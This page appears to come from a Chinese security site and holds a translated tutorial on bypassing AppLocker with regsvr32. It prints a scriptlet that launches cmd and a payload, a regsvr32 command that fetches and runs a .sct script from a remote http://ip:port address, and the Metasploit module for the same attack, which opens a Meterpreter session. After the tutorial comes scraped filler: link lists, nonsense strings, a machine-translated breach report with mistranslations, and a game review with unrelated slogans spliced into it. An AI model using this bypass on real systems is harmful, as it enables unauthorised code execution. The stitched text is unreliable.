利用Regsvr32绕过Applocker的限制策略

AppLocker的设计初衷就是为了帮助管理员Windows安装文件,可执行文件以及用户脚本的执行。从各种各样的奇淫巧计中我们得知这些限制是可以绕过的,例如在windows环境下通过AppLocker配置以限制脚本的执行,利用regsrv32命令行工具就可以完成绕过。

image

regsvr32是windows命令行实用工具用于注册动态链接库文件,向系统注册控件或者卸载控件的命令。Casey Smith发现通过调用regsrv32实用程序执行一条命令或者.sct文件有可能绕过AppLocker的脚本规则。由于该实用程序是由微软官方签名的所以好处多多啦,支持TLS加密,遵循重定向方式,不会在磁盘上留下痕迹。

以下脚本为Casey Smith提供的代码修改版,我们仅调用 calc.exe或cmd.exe。如果允许使用命令行提示符,脚本将在目标系统上执行自定义二进制代码:

<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">

<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe"); 
]]>

</script>
</registration>
</scriptlet>

regsvr32实用工具可从托管的web服务器上请求以及执行脚本:

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

image

regsrv32指令选项:

  • /s 静默执行
  • /n 指定不调用DllRegisterServer,此选项必须与/i共同使用
  • /i 调用DllInstall将它传递到可选的[cmdline],在与 /u 共同使用时,它调用DllUnstall
  • /u 反注册控件

当然也可以利用regsvr32在本地运行存储的有效载荷:

regsvr32 /u /n /s /i:payload.sct scrobj.dll

该命令将直接从托管文件的web服务器上执行脚本,嵌入.sct文件的JavaScript代码将引导pentestlab3.exe程序在命令提示符下执行。
image

由于pentestlab3是一个Metasploit payload,所以随后会打开一个Meterpreter会话:
image

当然,直接执行脚本还是会被拦截。但通过上面方法使用regsvr32进行绕过是可以的。image

Metasploit

Metasploit框架有一个特定的有效载荷,可用于通过Regsvr32实用程序实现自动化绕过AppLocker

exploit/windows/misc/regsvr32_applocker_bypass_server

该模块将启用一个用于存储恶意.sct文件的web服务,同时也提供用于在目标系统下执行的命令
image

命令执行后regsvr32将从web服务器请求.sct文件,然后执行PowerShell payload

image

最后成功绕过绕过AppLocker限制

image

参考资源

https://www.rapid7.com/db/modules/exploit/windows/misc/regsvr32_applocker_bypass_serverhttp://subt0x10.blogspot.co.uk/2017/04/bypass-application-whitelisting-script.html

参考来源:pentestlab,freebuf小编鸢尾编译,转载请注明来自FreeBuf.com

信息安全意识游戏之捕鱼达人主题赛

猜您喜欢

面对信息安全大挑战,建透明机制比各建篱笆更务实可行
BrandPost:身份管理移动性管理=移动生产力 http://news.chinacybersecurity.org/201705251693.html
中小零售商要特别小心在线诈骗
网络安全法网络宣传片 002 国家网络安全的现状与重要性概述
SHOPWESTFARMS CHUCKYSFIGHT
移动应用威胁报告称社交网络应用最危险
数据安全调查报告解读

Ca:网站的黑客暴露的草原山健康 患者个人医疗信息

网络安全宣教动漫——揭密社工黑客

The Brandon Sun reports:
Brandon Sun报道:
Personal and medical information of more than 1,000 Prairie Mountain Health patients are at risk after an internal website was hacked.
超草原山区健康患者的个人和医疗信息的风险后,一个内部网站被砍死。
The regional health authority, in a statement Friday, said they do not believe the intent of the hack was to access personal information, but conceded they cannot exclude the possibility that identifiable personal details were viewed or copied.
区域卫生当局星期五发表声明说,他们不相信黑客的意图是获取个人信息,但承认他们不能排除的可能性,可识别的个人资料被浏览或复制。
Subscription required to read the full story.
订阅需要阅读完整的故事。
Now you shouldnt need a subscription to a news outlet to find out about a breach involving your information, right? So I went to Prairie Mountain Healths site to find a breach disclosure or notice, but NOTHING was mentioned on their site.
终端安全靠智能系统相关的厂商和开发人员将安全功能置入到设备内,除了设备本身的操作系统和少量应用软件,其它大量的移动应用涉及大量的开发人员。
现在你不需要订阅一个新闻插座,找出违反涉及你的信息,对不对?所以我去了草原山健康网站找到违反披露或通知,但没有在他们的网站上提到。
Cmon folks: if you can send a press release to your local media, you can post a copy of the damned statement on your web site. In fact, you should be posting something on your web site and notifying patients even before you notify media.
来吧朋友们:如果你能送你一份新闻稿当地媒体,你可以发一份你的网站该死的声明。事实上,你应该在你的网站上张贴一些东西,甚至在通知媒体之前通知患者。
So I tweeted an inquiry to their Twitter team asking where the notification is. If I find out more, Ill update this.
所以我推了一个询问他们的Twitter团队询问通知。如果我发现更多,我会更新这个。
Android的开放性导致了大量恶意软件的滋生,实际上这说法不科学,用户为王,大量安全意识薄弱的用户才是大量恶意软件滋生和加以利用的根本原因。

猜您喜欢

中联重科与新快报陈永洲事件背后的信息安全思考
信息安全培训检测
网络安全法培训短片
小S大女儿越长越美 脸蛋如妈妈气质也好
OTRAPUSE NDAHINGHAM
信息安全第一课——丢弃毁坏的U盘

Huawei Watch 2 Classic Review: Good watch but a missed opportunity for Wear 2.0

哈药股份一季度净利骤降 社保基金加仓

扫描TCP/IP服务——使用如Nmap等端口和服务扫描软件扫描您的电脑或网络,并且关闭或移除那些不必要的服务。不必要的服务可能会被攻击者利用来获取您的系统的控制权限。

制定公司社交网络使用策略之前需了解什么信息安全问题呢?

猜您喜欢

IT牛校:热舒夫信息技术与管理大学
移动金融服务中的信息安全问题实录
网络安全法培训短片
明星片场打游戏照曝光:“高小琴”太优雅
GEWINNSPIELE BDCUSTOMZ
一分钟的信息安全意识动画片,轻松演绎企业信息安全基础知识。

Far Cry 5s first trailer reveals religious cults and explosions in picturesque Montana

Dim the lights, blast the dubstep, and throw on some Aisha Tyler interviews in the background—Ubisoft just kicked off its E3 press conference three weeks before the event with the first-ever trailer for Far Cry 5.
移动应用,云计算时代,终端安全需要多重防御,安全技术和解决方案的整合整合是大势所趋。
Like every year, this early look has left me wondering “Why not just wait until the show itself?”, but I guess spoiling all the surprises in May is the new normal. In any case, here’s the trailer in question:
As revealed in teasers earlier this week, the game takes place in Hope County, Montana—yes, within the United States, which is a surprisingly rare move. And in shades of Outlast 2, the region’s been overrun by the religious cult Eden’s Gate, which will be your primary enemy in the game. “Religious cult” is the general wording Ubisoft uses, though all the imagery and the church architecture shown is not-so-ambiguously Christian in influence.
[ Further reading: These 20 absorbing PC games will eat days of your life ]Aside from the surprising setting, though, I expect standard Far Cry shenanigans, or at least, what’s become standard since Far Cry 3: a big open world, a few lackey-controlled regions to take over, and according to Ubisoft, “the largest customizable weapon and vehicle roster ever in a Far Cry game.” Much of that is speculation, though, as the trailer focuses on the setting and characters more than the game itself. There is however a throwaway shot of hunting, so expect to make bullet pouches out of six deer skins again.
首都网络安全日:深圳CA用创新诠释信息安全重要性
We’ll see more in a few weeks. Far Cry 5 should appear at both Ubisoft’s press conference and either Microsoft or Sony’s with a meaty 20-minute demo each time. By June 12, we should have a pretty damn good idea of what the game is and what to expect, and then we settle in for the long wait—the game is set to release February 27, 2018. Stay tuned.
To comment on this article and other PCWorld content, visit our Facebook page or our Twitter feed.
Related:
Gaming
Hayden writes about games for PCWorld and doubles as the resident Zork enthusiast.
Follow

微博客户端多种多样,特别是移动客户端的普及,微博服务也越来越重视内容通讯的安全,要从网关层面完全控制员工的微博行为困难重重,所以加强技术控管时,一定要加强员工对微博的安全使用的教育。

猜您喜欢

识破黑客攻击邮件系统盗号套路
信息安全培训检验
网络安全法学习课堂
3岁女儿不会上厕所被退学 吴奇隆前妻反应竟是…
6REEQA HELPMELAW
网络安全宣传周公益教育动画APT高级持续威胁